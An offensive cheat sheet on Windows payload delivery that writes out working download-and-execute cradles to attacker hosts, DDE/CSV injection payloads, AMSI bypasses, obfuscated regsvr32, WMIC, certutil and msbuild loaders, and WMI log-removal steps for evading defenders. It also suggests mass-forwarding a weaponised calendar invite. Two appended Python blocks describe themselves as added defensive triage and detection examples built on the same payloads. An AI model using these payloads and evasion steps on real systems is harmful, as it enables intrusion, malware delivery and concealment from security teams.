Payload-Delivery-Cheat-Sheet
***********************************************************************************************
Simple File Transfer
***********************************************************************************************
dump bin to hex:
xxd -p poc_cve_2015_0235 > dump.hex
reverse hex to bin:
xxd -p -r dump.hex > dumpfile.bin && chmod +x dumpfile.bin
bitsadmin.exe /transfer "JobName" http://192.168.1.2:8081/MeterpreterBasic.exe C:\Users\tatamaster\Desktop\t.exe
The PowerShell (wget.ps1) script to download a final payload (Meterpreter?) once RCE is obtained:
echo $storageDir = $pwd > get.ps1
echo $webclient = New-Object System.Net.WebClient >> get.ps1
echo $url = "http://10.11.0.244:1337/evil.exe" >> get.ps1
echo $file = "msf.exe" >> get.ps1
echo $webclient.DownloadFile($url,$file) >> get.ps1
Finally it can be executed with the following command (once the Metasploit exploit/multi/handler has been launched):
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
***********************************************************************************************
Windows Payload Delivery and Execution Techniques
***********************************************************************************************
DDE/CSV injections:
=cmd|'/c powershell.exe -encodedCommand JwBQAG8AQwAgAEQARABFACAAcAB3AG4AJwA= >> C:\\Users\\Default\\Desktop\\PoC.out'!_xlbgnm.A1
Payload for Word:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}
{DDEAUTO c:\\windows\\system32\\cmd.exe "/c powershell.exe -encodedCommand JwBQAG8AQwAgAEQARABFACAAcAB3AG4AJwA= >> C:\\Users\\Default\\Desktop\\PoC.out"}
Outlook:
Copy/paste the docx payload and add it to a calendar invitation -> forward it to all of the company's users
Open a browser for BeEF hooking via DDEAUTO, for example:
{DDEAUTO c:\\windows\\system32\\cmd.exe "/k start chrome --new-window https://attacker.com/beef-with-valid-SSLcert/index.html"}
- In .xls(x) injection payloads, use two single quotes to escape a single quote in the PowerShell IEX payload (even if b64 encoded) -> DownloadString(''http://attacker.com'')
-> Example xlsx:
=cmd|'/c powershell.exe -command iex (new-object Net.WebClient).DownloadString(''http://trololo/f.ps1'')'!_A1
- Always use Unicode.GetBytes in PowerShell to correctly convert payloads to B64 (PowerShell expects base64 over UTF-16LE): [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("sh.ps1")))
-> Example:
#B64 Encoding:
$Base64 = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes([System.IO.File]::ReadAllText("amsi-bypass.ps1")))
Write-Output $Base64| Out-File "payload-b64"
#B64 Decoding:
$bytes = [Convert]::FromBase64String($Base64)
[IO.File]::WriteAllBytes("payload-b64-decoded", $bytes)
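As an added defender-side example (not part of the original cheat sheet), the following Python triages a spreadsheet cell the way a CSV importer or mail gateway might: it flags the DDE app|topic formula syntax used by the payloads above, decodes the -encodedCommand argument (base64 over UTF-16LE, which is why Unicode.GetBytes is needed on the encoding side) and neutralises the cell with a leading single quote. The regexes, function names and the reuse of the page's PoC string as a constructed sample are this example's own assumptions.

```python
import base64
import re

# Cell-leading characters spreadsheets treat as formula triggers (OWASP CSV
# injection list); "-" also catches negative numbers, so tune for your data.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")
# DDE syntax used by the payloads above: =app|'topic'!item
DDE_RE = re.compile(r"^[=+\-@]\s*\w+\s*\|")
# PowerShell -e / -ec / -enc / -encodedCommand followed by a base64 blob
ENC_RE = re.compile(r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

def is_dde_formula(cell: str) -> bool:
    """True if the cell starts with a formula trigger and uses DDE app|topic syntax."""
    return bool(DDE_RE.match(cell.lstrip()))

def decode_encoded_command(text: str):
    """Decode a PowerShell -EncodedCommand argument, which is base64 over
    UTF-16LE (hence Unicode.GetBytes on the encoding side).
    Returns None when no such argument is present or it does not decode."""
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def neutralise_cell(cell: str) -> str:
    """Defuse a formula-looking cell for CSV export by prefixing a single
    quote, so the spreadsheet stores it as literal text."""
    return "'" + cell if cell.startswith(FORMULA_TRIGGERS) else cell

def triage_cell(cell: str) -> dict:
    """Run all checks on one cell and report the findings."""
    return {"dde": is_dde_formula(cell),
            "decoded": decode_encoded_command(cell),
            "safe": neutralise_cell(cell)}

# Constructed sample: the xlsx/CSV DDE payload quoted on this page.
SAMPLE = ("=cmd|'/c powershell.exe -encodedCommand "
          "JwBQAG8AQwAgAEQARABFACAAcAB3AG4AJwA= >> C:\\Users\\Default\\Desktop\\PoC.out'!_xlbgnm.A1")
```

Running triage_cell(SAMPLE) decodes the embedded argument to the harmless marker string 'PoC DDE pwn', which is what the page's PoC encodes.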
- Payload using a dropper (in-memory execution) with the MSF web_delivery module:
# Source: https://github.com/jaredhaight/Invoke-MetasploitPayload
powershell.exe -nop -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/jaredhaight/Invoke-MetasploitPayload/master/Invoke-MetasploitPayload.ps1')|iex; Invoke-MetasploitPayload ('http://MSF-HANDLER:8080/posh-payload')"
- Payload with web_delivery/Meterpreter, or hosted with SimpleHTTPServer (b64 encoded), + AMSI bypass (customise your template for AV / use unicorn):
- Non-updated Win10:
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
$e=new-object net.webclient;
$e.proxy=[Net.WebRequest]::GetSystemWebProxy();
$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $e.downloadstring('http://attacker-trusted-domain/pwn');
- Up-to-date Windows 10 (27/09/2018):
[ScriptBlock]."Get`Fiel`d"('signatures','N'+'onPublic,Static').SetValue($NULL,(New-Object Collections.Generic.HashSet[string]));
$e=new-object net.webclient;
$e.proxy=[Net.WebRequest]::GetSystemWebProxy();
$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
IEX $e.downloadstring('http://192.168.56.1/MeterRsh.txt');
Steps:
Create your payload with msfvenom/unicorn (Meterpreter -> psh-net format, hosted as "payload.txt") + set up the handler -> host it -> convert the AMSI-bypassing payload to b64 -> execute the generated b64 payload
--> More on AMSI and other PowerShell-based bypasses:
https://github.com/kmkz/PowerShell and/or Defense-Evasion-cheat-Sheet
- Obfuscated payload example that triggers a web_delivery (or other):
-> useful for Rubber Ducky because there are no cmd.exe/powershell.exe calls, just regsvr32 + an .sct file with the embedded payload
ftp.exe -> !r^E^g^S^v^R^3^2 /^s /^n /^u /^i:http://attacker-Domain/policy.sct s^C^r^O^b^j.D^l^L
- XSL payload delivery (WMI), useful against restricted environments (AppLocker etc.):
C:\Windows\System32\WMIC.exe os get /format:"https://raw.githubusercontent.com/rasta-mouse/p0wnedLoader/master/p0wnedLoader.xsl"
- No IWR/IEX usage (no HTTP wrapper, though a UNC path is still a specific one):
powershell -file \\UNC-PATH\payload.ps1
[*] Payload delivery (from https://gist.github.com/HarmJ0y; most of them trigger or are blocked by MS defenses):
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# using bitstransfer - touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
# DNS TXT approach from PowerBreach (https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerBreach/PowerBreach.ps1) code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
# from @subtee - https://gist.github.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d
<#
<?xml version="1.0"?>
<command>
<a>
<execute>Get-Process</execute>
</a>
</command>
#>
$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
# Blue team/detection mechanism evasion for WMI-based droppers:
# (Add the following lines to your payload to remove the Windows "Applications" Event Viewer logs)
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_PersistenceEvent_'"| Remove-WmiObject
Get-WmiObject __eventFilter -namespace root/subscription -filter "name='_ProcessCreationEvent_'"| Remove-WmiObject
[*] Proxy-aware payload delivery + code exec. with AWL bypass (tested on up-to-date Win10 with TrendMicro OfficeScan + AMSI + active proxy):
-> Follow the steps described in the comment: https://raw.githubusercontent.com/kmkz/Sources/master/Shellcode.csproj
-> Dropper: certutil.exe -urlcache -split -f http://attacker.lol/example.xml C:\temp\Windows.csproj
-> Execution with an indirect call to msbuild: wmic process call create "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\temp\Windows.csproj"
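An added detection example, not from the cheat sheet, covering the regsvr32/scrobj.dll, WMIC /format, certutil -urlcache and msbuild-via-WMI techniques listed above: it runs rule matching over constructed process-creation records (Sysmon Event ID 1 style fields) and strips cmd.exe caret obfuscation before matching, so the ftp.exe-launched r^E^g^S^v^R^3^2 spelling is caught. The field names, the rule set and the parent-process heuristic (WmiPrvSE.exe as the parent of wmic-created processes) are assumptions of this example.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 /
# Security 4688 fields; values are illustrative, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "ftp.exe", "image": "cmd.exe",
     "cmdline": r"cmd /c r^E^g^S^v^R^3^2 /^s /^n /^u /^i:http://attacker-Domain/policy.sct s^C^r^O^b^j.D^l^L"},
    {"parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://attacker.lol/example.xml C:\temp\Windows.csproj"},
    {"parent": "WmiPrvSE.exe", "image": "msbuild.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\temp\Windows.csproj"},
    {"parent": "cmd.exe", "image": "WMIC.exe",
     "cmdline": r'WMIC.exe os get /format:"https://raw.githubusercontent.com/x/p0wnedLoader.xsl"'},
    {"parent": "explorer.exe", "image": "msbuild.exe",
     "cmdline": r"msbuild.exe C:\src\app\app.csproj /t:Build"},
]

# Each rule: name, binary it concerns, regex over the normalised command line.
RULES = [
    ("regsvr32_remote_scriptlet", "regsvr32", re.compile(r"/i:https?://.*scrobj\.dll")),
    ("certutil_urlcache_download", "certutil", re.compile(r"-urlcache\b.*\bhttps?://")),
    ("wmic_remote_xsl", "wmic", re.compile(r"\bos get\b.*/format:\"?https?://")),
    ("msbuild_from_wmi", "msbuild", re.compile(r"\.csproj")),
]

def normalise(cmdline: str) -> str:
    """Undo cmd.exe caret escaping and case-fold, so an obfuscated spelling
    such as r^E^g^S^v^R^3^2 compares equal to regsvr32."""
    return cmdline.replace("^", "").lower()

def match_event(ev: dict) -> list:
    """Return the names of the rules this event triggers."""
    cmd = normalise(ev["cmdline"])
    image = ev["image"].lower()
    hits = []
    for name, binary, pattern in RULES:
        if binary not in image and binary not in cmd:
            continue
        if not pattern.search(cmd):
            continue
        # msbuild compiling a project is normal; flag only the WMI-spawned case.
        if name == "msbuild_from_wmi" and ev["parent"].lower() != "wmiprvse.exe":
            continue
        hits.append(name)
    return hits

def scan(events: list) -> dict:
    """Map each flagged command line to its rule hits; clean events are omitted."""
    return {ev["cmdline"]: h for ev in events if (h := match_event(ev))}
```

scan(SAMPLE_EVENTS) flags the first four constructed records and leaves the ordinary Explorer-launched msbuild build alone.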